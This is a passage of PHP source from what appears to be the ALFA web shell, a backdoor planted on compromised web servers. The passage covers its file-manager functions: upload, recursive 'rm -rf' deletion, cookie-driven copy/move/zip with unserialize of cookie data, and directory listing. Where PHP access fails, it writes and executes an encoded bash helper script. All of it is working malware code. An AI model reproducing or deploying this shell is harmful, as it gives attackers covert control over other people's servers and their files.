  2535. while (($f = @readdir($h)) !== false)
  2536. if (($f != ".") and ($f != ".."))
  2537. copy_paste($c.$s.'/',$f, $d.$s.'/');
  2538. } elseif(is_file($c.$s))
  2539. @copy($c.$s, $d.$s);
  2540. }
  2541. function alfaFilesMan(){
  2542. if(!empty ($_COOKIE['alfa_f']))
  2543. $_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);
  2544. if(!empty($_POST['alfa1'])){
  2545. switch($_POST['alfa1']){
  2546. case 'uploadFile':
  2547. $move_cmd_file = false;
  2548. $alfa_canruncmd = false;
  2549. if($GLOBALS['glob_chdir_false']){
  2550. $alfa_canruncmd = _alfa_can_runCommand(true,true);
  2551. $move_cmd_file = true;
  2552. }
  2553. if(_alfa_is_writable($GLOBALS['cwd'])){
  2554. $files = reArrayFiles($_FILES['f']);
  2555. $ret_files = array();
  2556. foreach($files as $file){
  2557. if($move_cmd_file&&$alfa_canruncmd){
  2558. alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
  2559. }else{
  2560. if(@move_uploaded_file($file['tmp_name'],$file['name'])){
  2561. $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file['name'])):array("name" => "????");
  2562. $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file['name'])):array("name" => "????");
  2563. $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($file['name']):"????");
  2564. $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($file['name']):"????");
  2565. $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));
  2566. $file_perm = alfaPermsColor($file['name']);
  2567. $file_size = @filesize($file['name']);
  2568. $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);
  2569. }
  2570. }
  2571. }
  2572. if(!$move_cmd_file){
  2573. echo json_encode($ret_files);
  2574. }
  2575. }else{
  2576. echo "noperm";
  2577. return;
  2578. }
  2579. if(!$move_cmd_file){
  2580. return;
  2581. }
  2582. break;
  2583. case 'mkdir':
  2584. $new_dir_cmd = false;
  2585. if($GLOBALS['glob_chdir_false']){
  2586. if(_alfa_can_runCommand(true,true)){
  2587. if(_alfa_is_writable($GLOBALS['cwd'])){
  2588. if(!_alfa_is_dir(trim($_POST['alfa2']))){
  2589. alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
  2590. echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
  2591. }else{
  2592. echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
  2593. }
  2594. }else{
  2595. echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
  2596. }
  2597. }else{
  2598. echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
  2599. }
  2600. }else{
  2601. if(_alfa_is_writable($GLOBALS['cwd'])){
  2602. if(!_alfa_is_dir(trim($_POST['alfa2']))){
  2603. if(!@mkdir(trim($_POST['alfa2']))){
  2604. echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
  2605. }else{
  2606. echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
  2607. }
  2608. }else{
  2609. echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
  2610. }
  2611. }else{
  2612. echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
  2613. }
  2614. }
  2615. break;
  2616. case 'delete':
  2617. function deleteDir($path){
  2618. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  2619. $dh = @opendir($path);
  2620. while(($item = @readdir($dh)) !== false){
  2621. $item = $path.$item;
  2622. if((basename($item) == "..") || (basename($item) == "."))
  2623. continue;
  2624. $type = @filetype($item);
  2625. if ($type == "dir")
  2626. deleteDir($item);
  2627. else
  2628. @unlink($item);
  2629. }
  2630. @closedir($dh);
  2631. @rmdir($path);
  2632. }
  2633. if(is_array(@$_POST['f']))
  2634. foreach($_POST['f'] as $f){
  2635. if($f == '..')
  2636. continue;
  2637. $f = rawurldecode($f);
  2638. if($GLOBALS["glob_chdir_false"]){
  2639. if(_alfa_can_runCommand(true,true)){
  2640. alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
  2641. }
  2642. }else{
  2643. alfaEx("rm -rf '".addslashes($f)."'",false,false);
  2644. if(@is_dir($f))
  2645. deleteDir($f);
  2646. else
  2647. @unlink($f);
  2648. }
  2649. }
  2650. if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
  2651. deleteDir(rawurldecode(@$_POST['alfa2']));
  2652. alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
  2653. }else{
  2654. @unlink(rawurldecode(@$_POST['alfa2']));
  2655. }
  2656. if($GLOBALS["glob_chdir_false"]){
  2657. $source = rawurldecode(@$_POST['alfa2']);
  2658. if($source!='..'&&!empty($source)){
  2659. if(_alfa_can_runCommand(true,true)){
  2660. alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
  2661. }
  2662. }
  2663. }
  2664. if(is_array($_POST['f']))
  2665. return;
  2666. break;
  2667. case 'paste':
  2668. if($_COOKIE['alfa_act'] == 'copy'&&isset($_COOKIE['alfa_f'])){
  2669. foreach($_COOKIE['alfa_f'] as $f)
  2670. copy_paste($_COOKIE['alfa_c'],$f, $GLOBALS['cwd']);
  2671. }elseif($_COOKIE['alfa_act'] == 'move'&&isset($_COOKIE['alfa_f'])){
  2672. function move_paste($c,$s,$d){
  2673. if(@is_dir($c.$s)){
  2674. @mkdir($d.$s);
  2675. $h = @opendir($c.$s);
  2676. while (($f = @readdir($h)) !== false)
  2677. if(($f != ".") and ($f != ".."))
  2678. copy_paste($c.$s.'/',$f, $d.$s.'/');
  2679. }elseif(@is_file($c.$s))
  2680. @copy($c.$s, $d.$s);
  2681. }
  2682. foreach($_COOKIE['alfa_f'] as $f)
  2683. @rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);
  2684. }elseif($_COOKIE['alfa_act'] == 'zip'&&isset($_COOKIE['alfa_f'])){
  2685. if(class_exists('ZipArchive')){
  2686. $zip = new ZipArchive();
  2687. $zipX = "alfa_".rand(1,1000).".zip";
  2688. if($zip->open($zipX, 1)){
  2689. @chdir($_COOKIE['alfa_c']);
  2690. foreach($_COOKIE['alfa_f'] as $f){
  2691. if($f == '..')continue;
  2692. if(@is_file($_COOKIE['alfa_c'].$f))
  2693. $zip->addFile($_COOKIE['alfa_c'].$f, $f);
  2694. elseif(@is_dir($_COOKIE['alfa_c'].$f)){
  2695. $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
  2696. foreach($iterator as $key=>$value){
  2697. $key = str_replace('\\','/',realpath($key));
  2698. if(@is_dir($key)){
  2699. if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
  2700. }else{$zip->addFile($key,$key);}}}}
  2701. @chdir($GLOBALS['cwd']);
  2702. $zip->close();
  2703. __alert('>> '.$zipX.' << is created...');}}
  2704. }elseif($_COOKIE['alfa_act'] == 'unzip'&&isset($_COOKIE['alfa_f'])){
  2705. if(class_exists('ZipArchive')){
  2706. $zip = new ZipArchive();
  2707. foreach($_COOKIE['alfa_f'] as $f) {
  2708. if($zip->open($_COOKIE['alfa_c'].$f)){
  2709. $zip->extractTo($_COOKIE['alfa_cwd']);
  2710. $zip->close();}}}}
  2711. unset($_COOKIE['alfa_f']);
  2712. break;
  2713. default:
  2714. if(!empty($_POST['alfa1'])){
  2715. if(in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))){
  2716. __alfa_set_cookie('alfa_act', @$_POST['alfa1']);
  2717. __alfa_set_cookie('alfa_f', @serialize($_POST['f']));
  2718. __alfa_set_cookie('alfa_c', @$_POST['c']);
  2719. return;
  2720. }
  2721. }
  2722. break;
  2723. }
  2724. }
  2725. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  2726. if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
  2727. $path = explode('/', $res[1]);
  2728. array_pop($path);
  2729. $_POST['c'] = implode('/', $path);
  2730. }
  2731. $cmd_dir = false;
  2732. if($dirContent === false){
  2733. if(_alfa_can_runCommand(true,true)){
  2734. $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];
  2735. @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  2736. if(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/haxorcgiapi/getdir.alfa")){
  2737. $bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";
  2738. $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);
  2739. __alfa_set_cookie("alfachdir_bash", "true");
  2740. __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);
  2741. }
  2742. $dirContent = alfaEx("cd ".$tmp_getdir_path."/haxorcgiapi;sh getdir.alfa '".addslashes(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd'])."'");
  2743. $dirContent = json_decode($dirContent, true);
  2744. if(is_array($dirContent)){
  2745. array_pop($dirContent);
  2746. $cmd_dir = true;
  2747. }else{
  2748. $dirContent = false;
  2749. }
  2750. }
  2751. }
  2752. alfahead();
  2753. AlfaNum(8,9,10,7,6,5,4);
  2754. $count_dirContent = @count($dirContent);
  2755. if($count_dirContent > 300){
  2756. @$_COOKIE["alfa_limited_files"] = 100;
  2757. }
  2758. $alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';
  2759. $alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;
  2760. $alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;
  2761. $alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';
  2762. $files_page_count = 1;
  2763. if($alfa_limited_files > 0){
  2764. $files_page_count = ceil($count_dirContent/$alfa_limited_files);
  2765. if($files_page_count > 1){
  2766. $files_page_count++;
  2767. }
  2768. }
  2769. echo '<div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\'alfa_sort_by\');" style="color:#25ff00;"><option value="name" '.($alfa_sort_by == 'name'?'selected':'').'>Name</option><option value="size" '.($alfa_sort_by == 'size'?'selected':'').'>Size</option><option value="modify" '.($alfa_sort_by == 'modify'?'selected':'').'>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\'alfa_filesman_direction\')" style="color:#25ff00;"><option value="asc" '.($alfa_filesman_direction == 'asc'?'selected':'').'>Ascending</option><option value="desc" '.($alfa_filesman_direction == 'desc'?'selected':'').'>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="'.$alfa_limited_files.'" oninput="this.value=this.value.replace(/[^0-9]/g,\'\');setCookie(\'alfa_limited_files\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">'.($count_dirContent-1).'</b></span></div><div class="header">';
  2770. if($dirContent == false){
  2771. echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
  2772. alfaFooter();
  2773. return;
  2774. }
  2775. global $sort;
  2776. $sort = array('name', 1);
  2777. if(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){
  2778. $sort[0] = $_COOKIE["alfa_sort_by"];
  2779. }
  2780. if(!empty($_POST['alfa1'])) {
  2781. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
  2782. $sort = array($match[1], (int)$match[2]);
  2783. }
  2784. if($alfa_files_page_number > ($files_page_count-1)){
  2785. $alfa_files_page_number = 1;
  2786. }
  2787. $checkbox_rand = rand(11111, 99999);
  2788. echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table id='filemanager_table' width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk".$checkbox_rand."' onclick='checkBox(this);' class='chkbx'><label for='mchk".$checkbox_rand."'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
  2789. $dirs = $files = array();
  2790. $n = $count_dirContent;
  2791. if($n > $alfa_limited_files && $alfa_limited_files > 0){
  2792. $n = ($alfa_limited_files * $alfa_files_page_number);
  2793. if($n > $count_dirContent){
  2794. $n = $count_dirContent;
  2795. }
  2796. }
  2797. $i = 0;
  2798. if($alfa_limited_files > 0 && $alfa_files_page_number > 1){
  2799. $i = $alfa_limited_files * ($alfa_files_page_number - 1);
  2800. }
  2801. $page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);
  2802. $cmd_dir_backp = "";
  2803. for(;$i<$n;$i++){
  2804. if($cmd_dir){
  2805. $filename = $dirContent[$i]["name"];
  2806. $file_owner = $dirContent[$i]["owner"];$file_group = $dirContent[$i]["group"];
  2807. $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
  2808. $file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
  2809. $file_size = $dirContent[$i]["size"];
  2810. if(substr($dirContent[$i]["name"], 0 ,1) == "/"){
  2811. $file_path = $dirContent[$i]["name"];
  2812. $dirContent[$i]["name"] = "..";
  2813. $filename = $dirContent[$i]["name"];
  2814. }else{
  2815. $file_path = $GLOBALS['cwd']."/".$dirContent[$i]["name"];
  2816. }
  2817. }else{
  2818. $filename = $dirContent[$i];
  2819. $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
  2820. $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
  2821. $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
  2822. $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
  2823. $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
  2824. $file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
  2825. $file_size = @filesize($GLOBALS['cwd'].$filename);
  2826. $file_path = $GLOBALS['cwd'].$filename;
  2827. }
  2828. $tmp = array('name' => $filename,
  2829. 'path' => $file_path,
  2830. 'modify' => $file_modify,
  2831. 'perms' => $file_perm,
  2832. 'size' => $file_size,
  2833. 'owner' => $file_owner,
  2834. 'group' => $file_group
  2835. );
  2836. if($filename == ".." && !$cmd_dir){
  2837. $tmp["path"] = str_replace("\\", "/", realpath($file_path));
  2838. }
  2839. if(!$cmd_dir){
  2840. if(@is_file($file_path)){
  2841. $arr_mrg = array('type' => 'file');
  2842. if(@is_link($file_path)){
  2843. $arr_mrg["link"] = readlink($tmp['path']);
  2844. }
  2845. $files[] = array_merge($tmp, $arr_mrg);
  2846. }elseif(@is_link($file_path)){
  2847. $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
  2848. }elseif(@is_dir($file_path)&& ($filename != ".")){
  2849. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  2850. }
  2851. }else{
  2852. if($dirContent[$i]["type"]=="file"){
  2853. $files[] = array_merge($tmp, array('type' => 'file'));
  2854. }else{
  2855. if($dirContent[$i]["name"] != "."){
  2856. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  2857. }
  2858. }
  2859. }
  2860. }
  2861. $GLOBALS['sort'] = $sort;
  2862. function alfaCmp($a, $b) {
  2863. if($GLOBALS['sort'][0] != 'size')
  2864. return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
  2865. else
  2866. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  2867. }
  2868. usort($files, "alfaCmp");
  2869. usort($dirs, "alfaCmp");
  2870. if(isset($_COOKIE["alfa_filesman_direction"])&& !empty($_COOKIE["alfa_filesman_direction"])){
  2871. if($_COOKIE["alfa_filesman_direction"] == 'desc'){
  2872. $files = array_reverse($files);
  2873. $dirs = array_reverse($dirs);
  2874. }
  2875. }
  2876. $files = array_merge($dirs, $files);
  2877. $l=0;
  2878. $cc=0;
  2879. foreach($files as $f){
  2880. $f['name'] = htmlspecialchars($f['name']);
  2881. $newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
  2882. $checkbox = 'checkbox_'.$checkbox_rand.$cc;
  2883. $raw_name = rawurlencode($f['name']);
  2884. $icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
  2885. $style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
  2886. echo '<tr class="fmanager-row" id="tr_row_'.$cc.'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td id="td_row_'.$cc.'">'.$icon.'<div style="'.$style.'"><a row="'.$cc.'" id="id_'.$cc.'" class="main_name" onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');" href="#action=fileman&path='.$GLOBALS['cwd'].'&file='.$raw_name.'" fname="'.$raw_name.'" ftype="file" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"':'').'>'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" href="#action=fileman&path='.$f['path'].'" fname="'.$raw_name.'" ftype="folder" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"':'').'><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?(isset($f['link'])?'[L] ':'').alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a id="id_chmode_'.$cc.'" href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
  2887. $f['perms'].'</td><td><a id="id_rename_'.$cc.'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a id="id_touch_'.$cc.'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a id="id_edit_'.$cc.'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a id="id_download_'.$cc.'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a id="id_delete_'.$cc.'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
  2888. $l = $l?0:1;
  2889. $cc++;
  2890. }
  2891. echo "<tr id='filemanager_last_tr'><td colspan=7>
  2892. <input type=hidden name=a value='FilesMan'>
  2893. <input type=hidden name=c value='".htmlspecialchars(($GLOBALS['glob_chdir_false']?$_POST['c']:$GLOBALS['cwd']))."'>
  2894. <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
  2895. <select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
  2896. <input type='submit' value=' '>
  2897. </form></table><div class='pages-holder'><div class='pages-number'>".$page_builder."</div></div></div></div>";
  2898. alfafooter();
  2899. }
  2900. function get_pagination_links($current_page, $total_pages){
  2901. $links = "";
  2902. if ($total_pages >= 1 && $current_page <= $total_pages) {
  2903. $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\"><<</a>";
  2904. $selected_page = "";
  2905. if($current_page == 1){
  2906. $selected_page = " active-page-number";
  2907. }
  2908. $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">1</a>";
  2909. $i = max(2, $current_page - 5);
  2910. if ($i > 2)
  2911. $links .= "<a class=\"page-number\">...</a>";
  2912. for (; $i < min($current_page + 6, $total_pages); $i++) {
  2913. if($i == $current_page){
  2914. $selected_page = " active-page-number";
  2915. }else{
  2916. $selected_page = "";
  2917. }
  2918. $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$i}</a>";
  2919. }
  2920. if ($i != $total_pages)
  2921. $links .= "<a class=\"page-number\">...</a>";
  2922. $selected_page = " last-page-number";
  2923. if($current_page == $total_pages){
  2924. $selected_page .= " active-page-number";
  2925. }
  2926. $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$total_pages}</a>";
  2927. $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\">>></a>";
  2928. }return $links;}
  2929. function alfaFilesTools(){
  2930. alfahead();
  2931. echo '<div class="filestools" style="height: 100%;">';
  2932. if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
  2933. $alfa1_decoded = $_POST['alfa1'];
  2934. $chdir_fals = false;
  2935. if(!@chdir($_POST['c'])){
  2936. $chdir_fals = true;
  2937. $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
  2938. $alfa_canruncmd = _alfa_can_runCommand(true,true);
  2939. if($alfa_canruncmd){
  2940. $slashed_alfa1 = addslashes($_POST['alfa1']);
  2941. $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
  2942. $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
  2943. }
  2944. }
  2945. if($_POST['alfa2'] == 'auto'){
  2946. if(is_array(@getimagesize($_POST['alfa1']))){
  2947. $_POST['alfa2'] = 'image';
  2948. }else{
  2949. $_POST['alfa2'] = 'view';
  2950. if($chdir_fals){
  2951. if($alfa_canruncmd){
  2952. $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
  2953. $mimetype = $mime[1];
  2954. if(!empty($mimetype)){
  2955. if(strstr($mimetype, "image")){
  2956. $_POST['alfa2'] = 'image';
  2957. }
  2958. }
  2959. }
  2960. }
  2961. }
  2962. }
  2963. if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
  2964. if(@$_POST['alfa2'] == 'mkfile'){
  2965. $_POST['alfa1'] = trim($_POST['alfa1']);
  2966. if($chdir_fals&&$alfa_canruncmd){
  2967. if(_alfa_is_writable($_POST["c"])){
  2968. alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
  2969. $_POST['alfa2'] = "edit";
  2970. }
  2971. }
  2972. if(!@file_exists($_POST['alfa1'])){
  2973. $fp = @fopen($_POST['alfa1'], 'w');
  2974. if($fp){
  2975. $_POST['alfa2'] = "edit";
  2976. fclose($fp);
  2977. }
  2978. }else{
  2979. $_POST['alfa2'] = "edit";
  2980. }
  2981. }
  2982. if(!_alfa_file_exists(@$_POST['alfa1'])){
  2983. echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
  2984. alfaFooter();
  2985. return;
  2986. }
  2987. if($chdir_fals){
  2988. $filesize = $file_info[3];
  2989. $uid["name"] = $file_info[1];
  2990. $gid["name"] = $file_info[2];
  2991. $permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
  2992. }else{
  2993. $uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
  2994. $gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
  2995. if(!$uid&&!$gid){
  2996. $uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
  2997. $gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
  2998. }
  2999. $permcolor = alfaPermsColor($_POST['alfa1']);
  3000. $filesize = @filesize($_POST['alfa1']);
  3001. if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
  3002. if(_alfa_can_runCommand()){
  3003. list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
  3004. }
  3005. }
  3006. }
  3007. if(substr($_POST['alfa1'], 0, 7) == "phar://"){
  3008. $alfa_file_directory = $_POST['alfa1'];
  3009. }else{
  3010. $alfa_file_directory = str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']);
  3011. }
  3012. echo '<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> '.htmlspecialchars(basename($alfa1_decoded)).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.dirname($alfa_file_directory).'</div>';
  3013. if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
  3014. if(!_alfa_is_dir($_POST['alfa1'])){
  3015. $m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
  3016. $ftype = "file";
  3017. }else{
  3018. $m = array('Chmod', 'Rename', 'Touch');
  3019. $ftype = "dir";
  3020. }
  3021. echo('<div>');
  3022. foreach($m as $v)
